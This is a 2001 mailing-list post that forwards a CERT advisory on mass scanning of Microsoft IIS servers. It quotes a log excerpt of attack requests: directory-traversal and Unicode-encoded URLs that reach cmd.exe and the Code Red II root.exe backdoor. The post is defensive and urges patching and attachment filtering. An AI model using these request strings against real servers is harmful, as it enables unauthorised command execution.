[ale] CodeRed attacks, here we go again. OTHER ATTACKS

Jonathan Rickman jonathan at xcorps.net
Tue Sep 18 13:10:27 EDT 2001 

On Tue, 18 Sep 2001, Ben Alexander wrote:

> You are probably seeing the same thing everyoen else is, from all
> networks.  The attacks look for Code Red 2 backdoor, attempt to exploit
> numerous other IIS vulnerabilities, try to execute TFTP to download a
> file called ADMIN.DLL, and a few other.

CERT advisory
=============
This morning (September 18th) the CERT/CC started receiving reports of a massive
increase in scanning directed at port 80
(HTTP). Reports indicate that this scanning activity is attempting to exploit
systems previously compromised by Code Red II
and/or the sadmind/IIS worm as well as other known vulnerabilities in Microsoft
Internet Information Server (IIS). Please
see CERT Vulnerability Note VU#111677 for information on the type of
vulnerability being exploited.

The following is a log excerpt of this scanning activity:

       GET /scripts/root.exe?/c+dir
       GET /MSADC/root.exe?/c+dir
       GET /c/winnt/system32/cmd.exe?/c+dir
       GET /d/winnt/system32/cmd.exe?/c+dir
       GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
       GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
       GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
       GET
/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
       GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

The CERT/CC has also received reports of a possibly new piece of malicious code
named "readme.exe" being sent via
email. Preliminary analysis indicates that this file may be related to the
increase in port 80 scanning activity.

Sites are encouraged to verify the state of security patches on all IIS servers
and email client software. Administrators may
also want to add filters to mail servers to block the "readme.exe" attachment.
In addition, sites may wish to notify users of
the existence of "readme.exe" and its potential threat.

=================

I just spoke with NIPC personnel. They will be releasing an advisory shortly. In
short...screen all attachments, patch all IIS boxen, and hunker down. This is
gonna get ugly.

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net

--
To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message body.

More information about the Ale mailing list